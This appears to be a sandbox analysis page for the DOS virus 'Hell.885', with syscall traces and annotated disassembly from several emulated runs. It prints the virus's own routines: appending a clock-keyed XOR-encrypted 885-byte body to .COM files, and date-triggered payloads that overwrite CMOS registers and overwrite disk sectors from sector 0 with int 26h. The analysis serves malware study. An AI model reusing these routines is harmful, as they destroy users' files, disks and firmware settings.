Sample viewer

vx.netlux.org/Virus.DOS.VCC.Hell.885


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:04:26.565373079Z 26 PC: 12a73 | Set disk transfer address
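2018-12-17T23:04:26.567191888Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input'; note: that name is DOS function 01h, whereas interrupt vector 1 is the CPU single-step trap)
2018-12-17T23:04:26.569221302Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input'; note: that name is DOS function 03h, whereas interrupt vector 3 is the breakpoint interrupt)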
2018-12-17T23:04:26.570904538Z 78 PC: 12ad1 | Find first file
2018-12-17T23:04:26.577937779Z 61 PC: 12d49 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:04:26.586079352Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:04:26.593492966Z 66 PC: 12d67 | Move file pointer
2018-12-17T23:04:26.595457555Z 66 PC: 12d76 | Move file pointer
2018-12-17T23:04:26.598189067Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:04:26.614742675Z 66 PC: 12d8e | Move file pointer
; Window at the return from DOS Get time (int 21h, AH=2Ch): XOR the body, write it to the open file, XOR it back, close.
2018-12-17T23:04:26.617370674Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl  ; DL = hundredths of a second from Get time, stored at bp+0x475 - presumably the imm8 of the xor at 0x12db3 (confirm bp)
0x12d96: call 0x12dac  ; XOR pass over the body before writing
0x12d99: mov ah, 0x40  ; DOS write to file handle
0x12d9b: mov cx, 0x375  ; 0x375 = 885 bytes, the size in the following write row
0x12d9e: lea dx, word ptr [bp + 0x106]  ; write buffer starts at bp+0x106
0x12da2: int 0x21
0x12da4: call 0x12dac  ; applying the same XOR twice restores the in-memory bytes
0x12da7: mov ah, 0x3e  ; DOS close file
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]  ; XOR routine: region starts at bp+0x120
0x12db0: mov cx, 0x336  ; 0x336 = 822 bytes (bp+0x120..bp+0x455), inside the 885-byte write buffer
0x12db3: xor byte ptr [si], 0  ; single-byte XOR; immediate as captured in this window (0 here; it differs between windows on this page)
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3  ; loop until all 822 bytes are processed
0x12dba: ret
0x12dbb: add word ptr [bx], di  ; linear sweep past the ret; these bytes are presumably data, not code
0x12dbd: aas
0x12dbe: aas
2018-12-17T23:04:26.621181319Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-17T23:04:26.657535705Z 62 PC: 12dab | Close file
2018-12-17T23:04:26.666861083Z 79 PC: 12ad1 | Find next file
2018-12-17T23:04:26.670784328Z 61 PC: 12d49 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:04:26.678810478Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:04:26.686839413Z 66 PC: 12d67 | Move file pointer
2018-12-17T23:04:26.688475881Z 66 PC: 12d76 | Move file pointer
2018-12-17T23:04:26.691954721Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:04:26.695726884Z 66 PC: 12d8e | Move file pointer
; Window at the return from DOS Get time (int 21h, AH=2Ch): XOR the body, write it to the open file, XOR it back, close.
2018-12-17T23:04:26.698132803Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl  ; DL = hundredths of a second from Get time, stored at bp+0x475 - presumably the imm8 of the xor at 0x12db3 (confirm bp)
0x12d96: call 0x12dac  ; XOR pass over the body before writing
0x12d99: mov ah, 0x40  ; DOS write to file handle
0x12d9b: mov cx, 0x375  ; 0x375 = 885 bytes, the size in the following write row
0x12d9e: lea dx, word ptr [bp + 0x106]  ; write buffer starts at bp+0x106
0x12da2: int 0x21
0x12da4: call 0x12dac  ; applying the same XOR twice restores the in-memory bytes
0x12da7: mov ah, 0x3e  ; DOS close file
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]  ; XOR routine: region starts at bp+0x120
0x12db0: mov cx, 0x336  ; 0x336 = 822 bytes (bp+0x120..bp+0x455), inside the 885-byte write buffer
0x12db3: xor byte ptr [si], 0x48  ; single-byte XOR; immediate as captured in this window (0x48 here; it differs between windows on this page)
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3  ; loop until all 822 bytes are processed
0x12dba: ret
0x12dbb: add word ptr [bx], di  ; linear sweep past the ret; these bytes are presumably data, not code
0x12dbd: aas
0x12dbe: aas
2018-12-17T23:04:26.701986137Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-17T23:04:26.712267538Z 62 PC: 12dab | Close file
2018-12-17T23:04:26.722264485Z 79 PC: 12ad1 | Find next file
2018-12-17T23:04:26.725402116Z 61 PC: 12d49 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:04:26.738679326Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:04:26.747351429Z 66 PC: 12d67 | Move file pointer
2018-12-17T23:04:26.749079535Z 66 PC: 12d76 | Move file pointer
2018-12-17T23:04:26.750715476Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:04:26.754443096Z 66 PC: 12d8e | Move file pointer
; Window at the return from DOS Get time (int 21h, AH=2Ch): XOR the body, write it to the open file, XOR it back, close.
2018-12-17T23:04:26.756388502Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl  ; DL = hundredths of a second from Get time, stored at bp+0x475 - presumably the imm8 of the xor at 0x12db3 (confirm bp)
0x12d96: call 0x12dac  ; XOR pass over the body before writing
0x12d99: mov ah, 0x40  ; DOS write to file handle
0x12d9b: mov cx, 0x375  ; 0x375 = 885 bytes, the size in the following write row
0x12d9e: lea dx, word ptr [bp + 0x106]  ; write buffer starts at bp+0x106
0x12da2: int 0x21
0x12da4: call 0x12dac  ; applying the same XOR twice restores the in-memory bytes
0x12da7: mov ah, 0x3e  ; DOS close file
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]  ; XOR routine: region starts at bp+0x120
0x12db0: mov cx, 0x336  ; 0x336 = 822 bytes (bp+0x120..bp+0x455), inside the 885-byte write buffer
0x12db3: xor byte ptr [si], 0x48  ; single-byte XOR; immediate as captured in this window (0x48 here; it differs between windows on this page)
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3  ; loop until all 822 bytes are processed
0x12dba: ret
0x12dbb: add word ptr [bx], di  ; linear sweep past the ret; these bytes are presumably data, not code
0x12dbd: aas
0x12dbe: aas
2018-12-17T23:04:26.7594727Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-17T23:04:26.770407397Z 62 PC: 12dab | Close file
2018-12-17T23:04:26.779798827Z 79 PC: 12ad1 | Find next file
2018-12-17T23:04:26.783127817Z 61 PC: 12d49 | Open file (Filename = 'PHANG.COM')
2018-12-17T23:04:26.79163773Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:04:26.799517505Z 66 PC: 12d67 | Move file pointer
2018-12-17T23:04:26.801524309Z 66 PC: 12d76 | Move file pointer
2018-12-17T23:04:26.803816784Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:04:26.807414371Z 66 PC: 12d8e | Move file pointer
; Window at the return from DOS Get time (int 21h, AH=2Ch): XOR the body, write it to the open file, XOR it back, close.
2018-12-17T23:04:26.809403563Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl  ; DL = hundredths of a second from Get time, stored at bp+0x475 - presumably the imm8 of the xor at 0x12db3 (confirm bp)
0x12d96: call 0x12dac  ; XOR pass over the body before writing
0x12d99: mov ah, 0x40  ; DOS write to file handle
0x12d9b: mov cx, 0x375  ; 0x375 = 885 bytes, the size in the following write row
0x12d9e: lea dx, word ptr [bp + 0x106]  ; write buffer starts at bp+0x106
0x12da2: int 0x21
0x12da4: call 0x12dac  ; applying the same XOR twice restores the in-memory bytes
0x12da7: mov ah, 0x3e  ; DOS close file
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]  ; XOR routine: region starts at bp+0x120
0x12db0: mov cx, 0x336  ; 0x336 = 822 bytes (bp+0x120..bp+0x455), inside the 885-byte write buffer
0x12db3: xor byte ptr [si], 0x4e  ; single-byte XOR; immediate as captured in this window (0x4e here; it differs between windows on this page)
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3  ; loop until all 822 bytes are processed
0x12dba: ret
0x12dbb: add word ptr [bx], di  ; linear sweep past the ret; these bytes are presumably data, not code
0x12dbd: aas
0x12dbe: aas
2018-12-17T23:04:26.812702298Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-17T23:04:26.823089681Z 62 PC: 12dab | Close file
2018-12-17T23:04:26.832609352Z 79 PC: 12ad1 | Find next file
2018-12-17T23:04:26.836327736Z 61 PC: 12d49 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:04:26.844915408Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:04:26.852289195Z 66 PC: 12d67 | Move file pointer
2018-12-17T23:04:26.854218896Z 66 PC: 12d76 | Move file pointer
2018-12-17T23:04:26.856445619Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:04:26.859724535Z 66 PC: 12d8e | Move file pointer
; Window at the return from DOS Get time (int 21h, AH=2Ch): XOR the body, write it to the open file, XOR it back, close.
2018-12-17T23:04:26.861645187Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl  ; DL = hundredths of a second from Get time, stored at bp+0x475 - presumably the imm8 of the xor at 0x12db3 (confirm bp)
0x12d96: call 0x12dac  ; XOR pass over the body before writing
0x12d99: mov ah, 0x40  ; DOS write to file handle
0x12d9b: mov cx, 0x375  ; 0x375 = 885 bytes, the size in the following write row
0x12d9e: lea dx, word ptr [bp + 0x106]  ; write buffer starts at bp+0x106
0x12da2: int 0x21
0x12da4: call 0x12dac  ; applying the same XOR twice restores the in-memory bytes
0x12da7: mov ah, 0x3e  ; DOS close file
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]  ; XOR routine: region starts at bp+0x120
0x12db0: mov cx, 0x336  ; 0x336 = 822 bytes (bp+0x120..bp+0x455), inside the 885-byte write buffer
0x12db3: xor byte ptr [si], 0x53  ; single-byte XOR; immediate as captured in this window (0x53 here; it differs between windows on this page)
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3  ; loop until all 822 bytes are processed
0x12dba: ret
0x12dbb: add word ptr [bx], di  ; linear sweep past the ret; these bytes are presumably data, not code
0x12dbd: aas
0x12dbe: aas
2018-12-17T23:04:26.865597838Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-17T23:04:26.875353734Z 62 PC: 12dab | Close file
2018-12-17T23:04:26.884809516Z 26 PC: 12aeb | Set disk transfer address
; Window at the return from DOS Get date (int 21h, AH=2Ah; DH = month, DL = day): date checks gating three routines.
2018-12-17T23:04:26.886906774Z 42 PC: 12af7 | Get date 0x12af7: cmp dh, 7  ; month == 7 ?
0x12afa: jne 0x12b04
0x12afc: cmp dl, 0xe  ; day == 14 ?
0x12aff: jne 0x12b04
0x12b01: call 0x12b2e  ; reached only on 14 July; 0x12b2e is outside this window
0x12b04: mov ah, 0x2a  ; Get date again
0x12b06: int 0x21
0x12b08: cmp dh, 0xb  ; skip unless month >= 11 ...
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8  ; ... and day >= 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b  ; 0x12b3b is outside this window
0x12b15: mov ah, 0x2a  ; Get date a third time
0x12b17: int 0x21
0x12b19: cmp dh, 3  ; skip unless month >= 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b  ; 0x12b4b is outside this window
0x12b21: mov ah, 0x2c  ; Get time (DL = hundredths of a second)
0x12b23: int 0x21
0x12b25: cmp dl, 0x19  ; window ends here; the branch that follows is not shown
; Window at the return from the second Get date (DH = month, DL = day): remaining trigger checks and the start of the routine at 0x12b2e.
2018-12-17T23:04:26.889553886Z 42 PC: 12b08 | Get date 0x12b08: cmp dh, 0xb  ; skip unless month >= 11 ...
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8  ; ... and day >= 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b  ; 0x12b3b is outside this window
0x12b15: mov ah, 0x2a  ; Get date again
0x12b17: int 0x21
0x12b19: cmp dh, 3  ; skip unless month >= 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b  ; 0x12b4b is outside this window
0x12b21: mov ah, 0x2c  ; Get time (DL = hundredths of a second)
0x12b23: int 0x21
0x12b25: cmp dl, 0x19  ; skip unless hundredths < 25
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e  ; 0x12b7e is outside this window
0x12b2d: ret
0x12b2e: mov al, 0x25  ; separate routine: AL starts at 0x25
0x12b30: out 0x70, al  ; on PC-compatible hardware port 0x70 is the CMOS/RTC index register: select register AL
0x12b32: out 0x71, al  ; port 0x71 is the CMOS/RTC data register: write the value AL into the selected register
0x12b34: dec al  ; window ends here; the loop condition is not shown
2018-12-17T23:04:26.892327958Z 25 PC: 12b3f | Get default drive
; Window at the return from the third Get date (DH = month): month and time checks, the port 0x70/0x71 loop, and the start of the routine at 0x12b3b.
2018-12-17T23:04:26.896353634Z 42 PC: 12b19 | Get date 0x12b19: cmp dh, 3  ; skip unless month >= 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b  ; 0x12b4b is outside this window
0x12b21: mov ah, 0x2c  ; Get time (DL = hundredths of a second)
0x12b23: int 0x21
0x12b25: cmp dl, 0x19  ; skip unless hundredths < 25
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e  ; 0x12b7e is outside this window
0x12b2d: ret
0x12b2e: mov al, 0x25  ; separate routine: AL counts down from 0x25
0x12b30: out 0x70, al  ; on PC-compatible hardware port 0x70 is the CMOS/RTC index register: select register AL
0x12b32: out 0x71, al  ; port 0x71 is the CMOS/RTC data register: write the value AL into the selected register
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30  ; repeat down to AL = 1, overwriting those CMOS registers; port I/O presumably produces no row in this syscall table
0x12b3a: ret
0x12b3b: mov ah, 0x19  ; separate routine: DOS Get default drive (drive number returned in AL)
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111  ; window ends before CX and DX are used
0x12b42: mov dx, 0
2018-12-17T23:04:26.898855658Z 19 PC: 12b55 | Delete file
; Window at the return from Get time (DL = hundredths of a second): time check, the port 0x70/0x71 loop, the absolute-disk-write routine at 0x12b3b, and the start of 0x12b4b.
2018-12-17T23:04:26.909484383Z 44 PC: 12b25 | Get time 0x12b25: cmp dl, 0x19  ; skip unless hundredths < 25
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e  ; 0x12b7e is outside this window
0x12b2d: ret
0x12b2e: mov al, 0x25  ; separate routine: AL counts down from 0x25
0x12b30: out 0x70, al  ; on PC-compatible hardware port 0x70 is the CMOS/RTC index register: select register AL
0x12b32: out 0x71, al  ; port 0x71 is the CMOS/RTC data register: write the value AL into the selected register
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30  ; repeat down to AL = 1, overwriting those CMOS registers; port I/O presumably produces no row in this syscall table
0x12b3a: ret
0x12b3b: mov ah, 0x19  ; separate routine: DOS Get default drive (drive number returned in AL)
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111  ; sector count for int 26h: 0x1111 = 4369
0x12b42: mov dx, 0  ; starting logical sector 0
0x12b45: int 0x26  ; DOS absolute disk write to drive AL; the DS:BX buffer is not set in this window. Not an int 21h call, so presumably not logged as a row
0x12b47: add sp, 2  ; int 26h leaves the flags word on the stack; discard it
0x12b4a: ret
0x12b4b: mov ah, 0x13  ; separate routine: AH=13h is DOS delete file via FCB; the rest is outside this window
0x12b4d: push cs

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14874,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:53.608838156Z 26 PC: 12a73 | Set disk transfer address
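2018-12-25T12:41:53.610731739Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input'; note: that name is DOS function 01h, whereas interrupt vector 1 is the CPU single-step trap)
2018-12-25T12:41:53.612815535Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input'; note: that name is DOS function 03h, whereas interrupt vector 3 is the breakpoint interrupt)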
2018-12-25T12:41:53.614176831Z 78 PC: 12ad1 | Find first file
2018-12-25T12:41:53.621214735Z 61 PC: 12d49 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:53.628070534Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:53.634547378Z 66 PC: 12d67 | Move file pointer
2018-12-25T12:41:53.636497644Z 66 PC: 12d76 | Move file pointer
2018-12-25T12:41:53.642998397Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:53.645586085Z 66 PC: 12d8e | Move file pointer
; Window at the return from DOS Get time (int 21h, AH=2Ch): XOR the body, write it to the open file, XOR it back, close.
2018-12-25T12:41:53.646849312Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl  ; DL = hundredths of a second from Get time, stored at bp+0x475 - presumably the imm8 of the xor at 0x12db3 (confirm bp)
0x12d96: call 0x12dac  ; XOR pass over the body before writing
0x12d99: mov ah, 0x40  ; DOS write to file handle
0x12d9b: mov cx, 0x375  ; 0x375 = 885 bytes, the size in the following write row
0x12d9e: lea dx, word ptr [bp + 0x106]  ; write buffer starts at bp+0x106
0x12da2: int 0x21
0x12da4: call 0x12dac  ; applying the same XOR twice restores the in-memory bytes
0x12da7: mov ah, 0x3e  ; DOS close file
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]  ; XOR routine: region starts at bp+0x120
0x12db0: mov cx, 0x336  ; 0x336 = 822 bytes (bp+0x120..bp+0x455), inside the 885-byte write buffer
0x12db3: xor byte ptr [si], 0  ; single-byte XOR; immediate as captured in this window (0 here), before the store at 0x12d92 runs
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3  ; loop until all 822 bytes are processed
0x12dba: ret
0x12dbb: add word ptr [bx], di  ; linear sweep past the ret; these bytes are presumably data, not code
0x12dbd: aas
0x12dbe: aas
2018-12-25T12:41:53.649482135Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-25T12:41:53.672954624Z 62 PC: 12dab | Close file
2018-12-25T12:41:53.680607456Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:53.683697485Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:53.690259773Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:53.696585349Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:53.699233321Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:53.700432947Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:53.70282429Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:53.710400173Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:53.713071934Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:53.721023758Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:53.730586697Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:53.733411096Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:53.739374771Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:53.743976445Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:53.745004608Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:53.746006157Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:53.748344001Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:53.749364946Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:53.751142833Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:53.758931644Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:53.764479023Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:53.767362696Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:53.774549169Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:53.781176673Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:53.782719291Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:53.7851929Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:53.788022443Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:53.789574309Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:53.792404134Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:53.801281738Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:53.809228041Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:53.811857166Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:53.818894416Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:53.825193067Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:53.826799888Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:53.829111623Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:53.831507662Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:53.83284423Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:53.835997424Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:53.844352958Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:53.852355676Z 26 PC: 12aeb | Set disk transfer address
; Window at the return from DOS Get date (int 21h, AH=2Ah; DH = month, DL = day): date checks gating three routines.
2018-12-25T12:41:53.854423025Z 42 PC: 12af7 | Get date 0x12af7: cmp dh, 7  ; month == 7 ?
0x12afa: jne 0x12b04
0x12afc: cmp dl, 0xe  ; day == 14 ?
0x12aff: jne 0x12b04
0x12b01: call 0x12b2e  ; reached only on 14 July; 0x12b2e is outside this window
0x12b04: mov ah, 0x2a  ; Get date again
0x12b06: int 0x21
0x12b08: cmp dh, 0xb  ; skip unless month >= 11 ...
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8  ; ... and day >= 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b  ; 0x12b3b is outside this window
0x12b15: mov ah, 0x2a  ; Get date a third time
0x12b17: int 0x21
0x12b19: cmp dh, 3  ; skip unless month >= 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b  ; 0x12b4b is outside this window
0x12b21: mov ah, 0x2c  ; Get time (DL = hundredths of a second)
0x12b23: int 0x21
0x12b25: cmp dl, 0x19  ; window ends here; the branch that follows is not shown
; Window at the return from the second Get date (DH = month, DL = day): remaining trigger checks and the start of the routine at 0x12b2e.
2018-12-25T12:41:53.857093989Z 42 PC: 12b08 | Get date 0x12b08: cmp dh, 0xb  ; skip unless month >= 11 ...
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8  ; ... and day >= 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b  ; 0x12b3b is outside this window
0x12b15: mov ah, 0x2a  ; Get date again
0x12b17: int 0x21
0x12b19: cmp dh, 3  ; skip unless month >= 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b  ; 0x12b4b is outside this window
0x12b21: mov ah, 0x2c  ; Get time (DL = hundredths of a second)
0x12b23: int 0x21
0x12b25: cmp dl, 0x19  ; skip unless hundredths < 25
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e  ; 0x12b7e is outside this window
0x12b2d: ret
0x12b2e: mov al, 0x25  ; separate routine: AL starts at 0x25
0x12b30: out 0x70, al  ; on PC-compatible hardware port 0x70 is the CMOS/RTC index register: select register AL
0x12b32: out 0x71, al  ; port 0x71 is the CMOS/RTC data register: write the value AL into the selected register
0x12b34: dec al  ; window ends here; the loop condition is not shown
; Window at the return from the third Get date (DH = month): month and time checks, the port 0x70/0x71 loop, and the start of the routine at 0x12b3b.
2018-12-25T12:41:53.85918262Z 42 PC: 12b19 | Get date 0x12b19: cmp dh, 3  ; skip unless month >= 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b  ; 0x12b4b is outside this window
0x12b21: mov ah, 0x2c  ; Get time (DL = hundredths of a second)
0x12b23: int 0x21
0x12b25: cmp dl, 0x19  ; skip unless hundredths < 25
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e  ; 0x12b7e is outside this window
0x12b2d: ret
0x12b2e: mov al, 0x25  ; separate routine: AL counts down from 0x25
0x12b30: out 0x70, al  ; on PC-compatible hardware port 0x70 is the CMOS/RTC index register: select register AL
0x12b32: out 0x71, al  ; port 0x71 is the CMOS/RTC data register: write the value AL into the selected register
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30  ; repeat down to AL = 1, overwriting those CMOS registers; port I/O presumably produces no row in this syscall table
0x12b3a: ret
0x12b3b: mov ah, 0x19  ; separate routine: DOS Get default drive (drive number returned in AL)
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111  ; window ends before CX and DX are used
0x12b42: mov dx, 0
; Window at the return from Get time (DL = hundredths of a second): time check, the port 0x70/0x71 loop, the absolute-disk-write routine at 0x12b3b, and the start of 0x12b4b.
2018-12-25T12:41:53.8623703Z 44 PC: 12b25 | Get time 0x12b25: cmp dl, 0x19  ; skip unless hundredths < 25
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e  ; 0x12b7e is outside this window
0x12b2d: ret
0x12b2e: mov al, 0x25  ; separate routine: AL counts down from 0x25
0x12b30: out 0x70, al  ; on PC-compatible hardware port 0x70 is the CMOS/RTC index register: select register AL
0x12b32: out 0x71, al  ; port 0x71 is the CMOS/RTC data register: write the value AL into the selected register
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30  ; repeat down to AL = 1, overwriting those CMOS registers; port I/O presumably produces no row in this syscall table
0x12b3a: ret
0x12b3b: mov ah, 0x19  ; separate routine: DOS Get default drive (drive number returned in AL)
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111  ; sector count for int 26h: 0x1111 = 4369
0x12b42: mov dx, 0  ; starting logical sector 0
0x12b45: int 0x26  ; DOS absolute disk write to drive AL; the DS:BX buffer is not set in this window. Not an int 21h call, so presumably not logged as a row
0x12b47: add sp, 2  ; int 26h leaves the flags word on the stack; discard it
0x12b4a: ret
0x12b4b: mov ah, 0x13  ; separate routine: AH=13h is DOS delete file via FCB; the rest is outside this window
0x12b4d: push cs

{"DateBased":true,"Day":1,"Month":7,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14874,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:53.625990874Z 26 PC: 12a73 | Set disk transfer address
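2018-12-25T12:41:53.628267745Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input'; note: that name is DOS function 01h, whereas interrupt vector 1 is the CPU single-step trap)
2018-12-25T12:41:53.629501304Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input'; note: that name is DOS function 03h, whereas interrupt vector 3 is the breakpoint interrupt)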
2018-12-25T12:41:53.630833276Z 78 PC: 12ad1 | Find first file
2018-12-25T12:41:53.6374326Z 61 PC: 12d49 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:53.644700922Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:53.650818995Z 66 PC: 12d67 | Move file pointer
2018-12-25T12:41:53.652488082Z 66 PC: 12d76 | Move file pointer
2018-12-25T12:41:53.654985135Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:53.657827932Z 66 PC: 12d8e | Move file pointer
; Window at the return from DOS Get time (int 21h, AH=2Ch): XOR the body, write it to the open file, XOR it back, close.
2018-12-25T12:41:53.65925492Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl  ; DL = hundredths of a second from Get time, stored at bp+0x475 - presumably the imm8 of the xor at 0x12db3 (confirm bp)
0x12d96: call 0x12dac  ; XOR pass over the body before writing
0x12d99: mov ah, 0x40  ; DOS write to file handle
0x12d9b: mov cx, 0x375  ; 0x375 = 885 bytes, the size in the following write row
0x12d9e: lea dx, word ptr [bp + 0x106]  ; write buffer starts at bp+0x106
0x12da2: int 0x21
0x12da4: call 0x12dac  ; applying the same XOR twice restores the in-memory bytes
0x12da7: mov ah, 0x3e  ; DOS close file
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]  ; XOR routine: region starts at bp+0x120
0x12db0: mov cx, 0x336  ; 0x336 = 822 bytes (bp+0x120..bp+0x455), inside the 885-byte write buffer
0x12db3: xor byte ptr [si], 0  ; single-byte XOR; immediate as captured in this window (0 here), before the store at 0x12d92 runs
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3  ; loop until all 822 bytes are processed
0x12dba: ret
0x12dbb: add word ptr [bx], di  ; linear sweep past the ret; these bytes are presumably data, not code
0x12dbd: aas
0x12dbe: aas
